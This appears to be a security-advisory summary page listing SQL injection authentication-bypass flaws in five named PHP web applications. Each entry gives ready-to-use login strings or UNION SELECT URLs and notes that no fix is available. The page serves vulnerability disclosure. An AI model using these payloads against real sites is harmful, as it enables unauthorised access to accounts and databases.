Recent Authentication Bypass SQL Injection vulnerabilities

Here is short summary of recent Authentication Bypass SQL Injection vulnerabilities discovered by eVuln team. Full list with details is available on the eVuln Security Advisories page.

Authentication Bypass by SQL Injection in Social Share.

Description.

Vulnerable script: functions.php

Parameter username is not properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code and log in without password.

Condition: magic_quotes: off

Exploit.

Username: anytext' or verified=1#

Password: arbitrary_text

Solution

Solution is not available.

Other details >>

SQL injection Auth Bypass in Easy Banner Free.

Description.

Vulnerability exists in member.php script. User-defined parameters username and password are not properly sanitized against SQL injections. This can be used to bypass authentication or execute arbitrary SQL query.

Exploit.

Authentication bypass in member.php is possible using one of the following SQL injections:

username: ' or 1#

password: ' or 'a'='a

magic_quotes_gpc = off

Solution

Solution is not available.

Other details >>

SQL-inj and Auth Bypass in 2200net Calendar system.

Description.

Vulnerable script: program/calendar/calendar.php

Variable fm_data[id] isn't properly sanitized. This can be used to make any SQL query by injecting arbitrary SQL code.

Condition: magic_quotes_gpc - off

Vulnerable script: class/classlogin/adminlogin.php

Variable $ad['acc'] isn't properly sanitized. This can be used to make any SQL query by injecting arbitrary SQL code.

Condition: magic_quotes_gpc - off

Exploit.

url: http://host/cal/admin.php?ad=login

login account: ' or 1/*

login password: any

http://host/cal/main.php?&po=calendar&op=calendar_only&fm_data[id]=999'%20union%20select%201,2,3,4,5,6,7,8,9/*

Solution

Solution is not available.

Other details >>

SQL Injection and Authentication Bypass in Calendarix.

Description.

Vulnerable scripts: cal_functions.inc.php admin/cal_login.php

Variables $catview(cal_functions.inc.php) $login(admin/cal_login.php) are not properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.

Authentication bypass is possible.

Condition for Authentication bypass: magic_quotes_gpc - off

Exploit.

Link: http://host/calendarix/admin/cal_login.php

username: ' or 1/*

password: any

http://host/calendarix/cal_day.php?op=day&date=2006-01-10&catview=99%20union%20select%2012345

Solution

Solution is not available.

Other details >>

SQL Injection Auth Bypass in Bit 5 Blog.

Description.

Vulnerable script: processlogin.php

Variables $_POST['username'] and $_POST['password'] are not properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code and log in without password.

Exploit.

Authentication bypass example (SQL Injection):

http://host/admin/index.php

User Name: a' or 1/*

Password: a' or 1/*

Solution

Solution is not available.

Other details >>
Advisories by vuln type

Website Monitoring

Daily malware scanning. Allows to receive alerts about security problems in your website.
Details >>

Malicious redirects detected?

eVuln team will eliminate the reason, clean your website and monitor it.
Details >>

Website blacklisted?

eVuln team will clean your website, discover and fix security holes, remove from blacklists.
Details >>